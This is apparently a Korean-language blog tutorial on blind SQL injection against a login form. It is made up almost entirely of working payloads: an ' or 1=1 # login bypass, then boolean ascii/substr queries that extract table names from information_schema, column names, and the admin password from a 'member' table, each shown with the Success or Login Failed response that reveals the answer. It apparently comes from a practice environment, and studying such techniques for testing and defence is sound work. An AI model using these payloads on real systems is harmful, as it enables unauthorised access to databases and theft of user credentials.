[WEB] Blind SQL Injection 공격 방법
- http://blog.naver.com/funny303/220778035079
- http://pypie.tistory.com/entry/Blind-SQL-Injection
- http://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html
1. SQL Injection 테스트
[SQL Injection Query] ' or 1=1 # |
[Request] 1) Success. // 성공 2) Login Failed // 실패 |
2. Blind Injection
2.1. Database 갯수 확인
[[ 데이터 베이스 확인 ]]
- Response : Success - Response : Login Failed |
2.2. 테이블 명 추출
[[ 테이블(information_schema.tables) 추출 ]] :: ascii 테이블을 기반으로 숫자를 변경하여 범위를 줄임 ' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 110 # - Response : Login Failed :: 첫번째 문자열 확인 ' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 108 # - Response : Success :: 확실히 맞는지 확인 ' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) = 109 # - Response : Success :: 두번째 문자열 확인 ' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),2,1)) = 109 # - Response : Success :: 마지막 문자열 확인 ' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),7,1)) = 0 # |
2.3. Column명 추출
[[ column 추출 - information_schema.columns ]] --> 테이블 명에서 찾은 "member"를 활용 :: ascii 테이블을 기반으로 숫자를 변경하여 범위를 줄임 ' or 1=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 110 # |
2.4. value 찾기
[[ 저장된 값 찾기 ]] ' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) > 100)# ' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),16,1)) =0)# |
이상으로 마칩니다.
thanks : silverbug (enviroment support)